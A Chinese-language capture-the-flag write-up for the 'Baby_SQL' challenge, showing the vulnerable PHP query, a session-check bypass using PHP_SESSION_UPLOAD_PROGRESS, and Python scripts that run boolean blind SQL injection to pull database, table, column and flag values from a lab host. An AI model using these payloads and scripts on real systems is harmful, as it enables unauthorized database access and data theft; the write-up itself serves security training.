# [PwnThyBytes——2019]Baby_SQL
ctrl+u 最下面:
</script> | |
<!-- /source.zip --> | |
</body> | |
</html> |
下载发现 /template 目录下的漏洞:
!isset($_SESSION) AND die("Direct access on this script is not allowed!");
include 'db.php';
$sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="' . $_GET['username'] . '" and password="' . md5($_GET['password']) . '";';
$result = $con->query($sql);
前提就是绕过这个 isset($_SESSION), 但是只有 regieter 和 login 有 SESSION 数组只有在 session_start () 初始化后才产生,所以只能伪造一个 session 来绕过 index,进行 sql 注入。
# 在 phpsession 里如果在 php.ini 中设置 session.auto_start=On,那么 PHP 每次处理 PHP 文件的时候都会自动执行 session_start (),但是 session.auto_start 默认为 Off。与 Session 相关的另一个叫 session.upload_progress.enabled,默认为 On,在这个选项被打开的前提下我们在 multipart POST 的时候传入 PHP_SESSION_UPLOAD_PROGRESS,PHP 会执行 session_start ()
# 这个方法同样可以用来进行文件包含和反序列化
直接脚本 bp 抓包:
import requests | |
url = "http://6a742e0c-c6b0-49a3-b626-f5f0578d17f1.node3.buuoj.cn/templates/login.php" | |
files = {"file": "123456789"} | |
a = requests.post(url=url, files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"}, | |
cookies={"PHPSESSID": "test1"}, params={'username': 'test', 'password': 'test'}, | |
proxies={'http': "http://127.0.0.1:8080"}) | |
print(a.text) |
返回 try again 就差不多了
双引号闭合:
exp:
import requests | |
import time | |
url = "http://6a742e0c-c6b0-49a3-b626-f5f0578d17f1.node3.buuoj.cn/templates/login.php" | |
files = {"file": "123456789"} | |
'''字段值''' | |
flag='' | |
for i in range(1,100): | |
low = 32 | |
high = 128 | |
mid = (low+high)//2 | |
while (low < high): | |
time.sleep(0.06) | |
# payload_flag ={'username': "test\" or (ascii(substr((select group_concat(username) from ptbctf ),{0},1))>{1}) #".format(i, mid),'password': 'test'} | |
payload_flag = { | |
'username': "test\" or (ascii(substr((select group_concat(secret) from flag_tbl ),{0},1))>{1}) #".format(i,mid),'password': 'test'} | |
r = requests.post(url=url,params=payload_flag,files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"}, | |
cookies={"PHPSESSID": "test1"}) | |
print(payload_flag) | |
if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text: | |
low = mid +1 | |
else: | |
high = mid | |
mid = (low + high) // 2 | |
if(mid==32 or mid == 132): | |
break | |
flag +=chr(mid) | |
print(flag) | |
print(flag) | |
# column='' | |
# for i in range(1,100): | |
# low = 32 | |
# high = 128 | |
# mid = (low+high)//2 | |
# while (low < high): | |
# time.sleep(0.06) | |
# payload_column ={'username': "test\" or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=\'flag_tbl\' ),{0},1))>{1}) #".format(i, mid),'password': 'test'} | |
# r = requests.post(url=url,params=payload_column,files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"}, | |
# cookies={"PHPSESSID": "test1"}) | |
# | |
# print(payload_column) | |
# if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text: | |
# low = mid +1 | |
# else: | |
# high = mid | |
# mid = (low + high) // 2 | |
# if(mid==32 or mid == 132): | |
# break | |
# column +=chr(mid) | |
# print(column) | |
# | |
# print(column) | |
# ''' 表名 ''' | |
# table='' | |
# for i in range(1,100): | |
# low = 32 | |
# high = 128 | |
# mid = (low+high)//2 | |
# while (low < high): | |
# time.sleep(0.06) | |
# payload_table ={'username': 'test" or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\'ptbctf\'),{0},1))>{1}) #'.format(i, mid),'password': 'test'} | |
# r = requests.post(url=url,params=payload_table,files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"}, | |
# cookies={"PHPSESSID": "test1"}) | |
# print(payload_table) | |
# if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text: | |
# low = mid +1 | |
# else: | |
# high = mid | |
# mid = (low + high) // 2 | |
# if(mid==32 or mid == 132): | |
# break | |
# table+=chr(mid) | |
# print(table) | |
# | |
# print(table) | |
# ''' 数据库名 ''' | |
# database='' | |
# for i in range(1,100): | |
# low = 32 | |
# high = 128 | |
# mid = (low+high)//2 | |
# while (low < high): | |
# time.sleep(0.06) | |
# payload_database ={'username': 'test" or (ascii(substr((select database()),{0},1))>{1}) #'.format(i, mid),'password': 'test'} | |
# r = requests.post(url=url,params=payload_database,files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"}, | |
# cookies={"PHPSESSID": "test1"}) | |
# print(payload_database) | |
# if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text: | |
# low = mid +1 | |
# else: | |
# high = mid | |
# mid = (low + high) // 2 | |
# if(mid==32 or mid == 132): | |
# break | |
# database+=chr(mid) | |
# print(database) | |
# | |
# print(database) |
参考链接:https://blog.csdn.net/SopRomeo/article/details/108967248